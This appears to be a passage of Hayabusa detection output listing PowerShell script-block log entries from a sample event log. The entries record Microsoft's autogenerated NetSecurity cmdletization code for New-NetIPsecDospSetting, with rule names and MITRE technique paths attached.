param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 